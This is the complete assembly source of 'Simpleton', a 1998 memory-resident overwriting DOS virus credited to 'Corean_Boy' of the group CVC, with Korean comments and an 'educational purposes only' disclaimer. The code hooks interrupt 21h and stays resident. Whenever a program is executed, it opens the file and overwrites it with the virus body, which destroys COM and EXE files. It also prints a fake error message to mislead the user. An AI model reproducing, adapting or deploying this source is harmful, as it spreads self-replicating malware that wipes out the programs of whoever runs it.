;<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
;
;                                              \\\\\\\  \       \   \\\\\\\
;                                             \          \     \   \
;         Simpleton                           \           \   \    \    98/05
;                                             \            \ \     \
;                                              \\\\\\\      \       \\\\\\\ #04
;
; Virus Name : Simpleton
; Author     : Corean_Boy
; Group      : CVC
; Origin     : Corea
; Date       : 1998/04/05
; Type       : Memory Resident COM/EXE  Overwriting
;
;  !*< 법률적 의무 >********************************************************!
;   *                                                                        *
;   * 경고 !                                                                 *
;   *        이 정보는 교육적인 목적으로만 사용되어야 합니다. 우리는 이      *
;   *        정보를 사용해서 발생하는 어떤 문제에 대해서도 책임을 지지 않    *
;   *        습니다. 모든 책임은 글을 읽는 사람에게 있습니다.                *
;   *                                                                        *
;   * Warning !                                                              *
;   *        This information is for educational purposes only. We are       *
;   *        not responsible for any problems caused by the use of this      *
;   *        information. Responsibility is entirely placed on the reader    *
;   *                                                                        *
;   !************************************************************************!
;
;   나의 첫 바이러스로 상주형 겹쳐쓰기 바이러스이다.
;   겹쳐쓰기 바이러스이므로 매우 위험하다.
;
;
;<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>

        .model tiny
        .code

PARASIZE        equ (End_Memory-code_begin + 0Fh) SHR 4 + 10h

        org     100h

code_begin:
        mov     ax,'CO'             ; COREAN
        mov     bx,'RE'
        mov     cx,'AN'
        int     21h

        cmp     ax,'BO'             ; BOY!
        jnz     Resident
        cmp     bx,'Y!'
        jnz     Resident

        mov     ah,9                ; 에러 메시지 출력
        mov     dx, offset Error_Message
        int     21h

        mov     ah,4ch              ; 프로그램 종료
        int     21h

 Resident:
        mov     ax,3521h            ; Int 21h 주소 얻기
        int     21h
        mov     word ptr int21_addr,bx
        mov     word ptr int21_addr[2],es

        mov     ah,25h              ; Int 21h 가로채기
        lea     dx,int21_virus      ; DX = int21_virus
        int     21h

        push    cs
        pop     es

        mov     ah,9                ; 에러 메시지 발생
        mov     dx, offset Error_Message
        int     21h

        mov     ah,31h
        mov     dx, PARASIZE
        int     21h

int21_virus  proc    near           ; Interrupt 21h of virus
        cmp     ax,'CO'             ; 상주 여부 검사
        jnz     Check_Execute       ; COREAN BOY!
        cmp     bx,'RE'
        jnz     Check_Execute
        cmp     cx,'AN'
        jnz     Check_Execute
        mov     ax,'BO'
        mov     bx,'Y!'
        iret

 Check_Execute:
        cmp     ax,4b00h            ; 실행인가 ?
        jnz     int21_exit          ;
Infect:
        push    ax
        push    bx
        push    cx
        push    dx
        push    ds

        mov     ax,3d02h            ; 파일 오픈
        int     21h
        jc      Open_error

        xchg    ax,bx               ; BX = file handle
        push    cs                  ;
        pop     ds                  ; cs=ds

        mov     ah,40h              ; 바이러스 쓰기
        mov     cx, offset End_Memory - 100h
        lea     dx, code_begin
        int     21h

        mov     ah, 3Eh
        int     21h

 Open_error:
        pop     ds
        pop     dx
        pop     cx
        pop     bx
        pop     ax

int21_exit:
        db      0eah                ; 점프
int21_addr      dd      ?           ; Address of interrupt 21h

                db      '[Simpleton]'
                db      'My first virus... by Corean_Boy / CVC 1998.04'
Error_Message   db      'Abnormal Program Termination$'


End_Memory:
        endp

        end     code_begin
